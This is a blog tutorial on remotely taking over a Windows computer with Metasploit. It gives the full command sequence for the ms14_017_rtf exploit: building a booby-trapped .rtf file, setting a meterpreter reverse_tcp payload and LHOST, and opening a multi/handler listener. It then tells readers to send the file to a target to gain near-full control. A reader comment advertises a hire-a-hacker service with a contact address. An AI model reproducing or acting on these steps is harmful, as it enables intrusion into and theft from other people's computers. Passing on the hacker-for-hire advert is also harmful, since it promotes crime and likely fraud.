How to hack a Computer Remotely ( Metasploit Tutorial )

At the time of writing of this post Google Receives about 8100 queries per month for “How to Hack a Computer” That is not the reason behind this blog post. What i am trying to say is how much people are curious for hack computers. Folks are trying to access someones database, some wants to get someones personal things. Well the thing is not easy but not too hard. Here in this tut i am gonna showing you how to hack a computer using kali linux.

Disclaimer– This tutorial is for educational propose only. The main motive behind the post is to guide as many as people how hackers hack computers or how they can steal your information easily. We do not recommend anyone to try this process. If someone face problems after applying this ,Neither author nor Moonking Hackers Club Will be responsible.

First let me tell you what will be covered into this post or how you will be able to hack a computer remotely.

In this article we will use the microsoft office vulneribility detected in 2014 and which found mostly in windows 7 computers. The intresting thing we all know that windows 8 is not so different from windows 7. So there are lot of chances that this bug will work also for Windows 8 Computers. Here is a what Microsoft published on their Security Bulletin. 

We will create a .rtf file and you need to send it to target. when your target will open this file in his/her Computer you will have a meterpreter session and You can do anything you want with the target system. that’s how you can hack a computer from your computer.

so that is the easiest way Most hackers can use to hack computers from another computer.

As usual we will start from Kali linux. You need to fire up Kali Linux. if You wana be an elite ethical hacker then here is a collection of some useful articles.

Let start the tutorial on how to hack a computer remotely.

Open Kali Linux and start msf console

You need to open Metasploit. You can fire up metasploit easily by going to

applications>Kali Linux>Top 10 security tools>metasploit framework

How to hack a Computer Remotely ( Metasploit Tutorial )

Choose Exploit to hack a computer over internet

now its time to initialize your exploit. run this command in metasploit

use exploit/windows/fileformat/ms14_017_rtf

how to hack a computer-use exploit

if you want a detailed information about this exploit then you can find by just typing info

Now check what options we have or what we need to fill up.Just type in your console show options . and there will be a list of lots of options you can set with this exploit

Decide the FILENAME

You can decide the filename as you want. It depends on your target. here i am choosing filename as doc . so you need to type “set FILENAME doc.rtf “

how to hack a computer-set filename

Set the Payload

And finally as usual a payload can be set by using following command for the doc.rtf file . this payload will help us to start a meterpreter session to hack remote computers over internet.

set PAYLOAD windows/meterpreter/reverse_tcp

how to hack a computer-set payload

Set the LHOST

Next you need to set the LHOST . This is the ip which will be called when .rtf file will be executed. You can find your ip address by typing ipconfig in CMD and iwconfig in Kali Terminal . Type following command to set LHOST

set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )now type 
exploit

How to hack a Computer Remotely ( Metasploit Tutorial )

Open a Multi-Handler for the Connection

to accept the connection back to your system you need to set up Multi Handler. type this command

use exploit/multi/handler

How to hack a Computer Remotely ( Metasploit Tutorial )now set payload
 set PAYLOAD windows/meterpreter/reverse_tcp

How to hack a Computer Remotely ( Metasploit Tutorial )now set LHOST
 set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )AND execute finally
 exploit

that’s it . Now you need to send the .rtf file to your target, when someone will click on .rtf file, a meterpreter session will be started on your computer. Now you have almost full access to target system. You need to brush up your meterpreter commands.

Rajendra Choudhary

Rajendra Choudhary is a engineering student and a professional blogger. His free time is spent on blogging, wordpress, creating videos for youtube channel to share his knowledge with rest of us

  • Hello Rajendra! Is .rtf extension is the one extension generated for that job? Is possible to generate another extension? .doc? .pdf? Excuse me for the question, i’m new in kali or metasploit world.

  • Sandra sydner

    Cyber Vor Group Hack ….
    would say am really impressed and its also unbelievable that they came out if the radar just to save the hackers name and show that history of their existence is still valid(you could search on the Google search engine to validate their abilities on any hacking jobs).Do you need a savvy hacker, one who would be able to carry out and successfully execute hacks on your behalf while keeping it all discrete and under the radar? Contact….

    cybervorgrouphack AT GMAIL DOT COM

    No up front payment and delivers with proof. Mail him today, Make use of the opportunity while still available.Good luck…….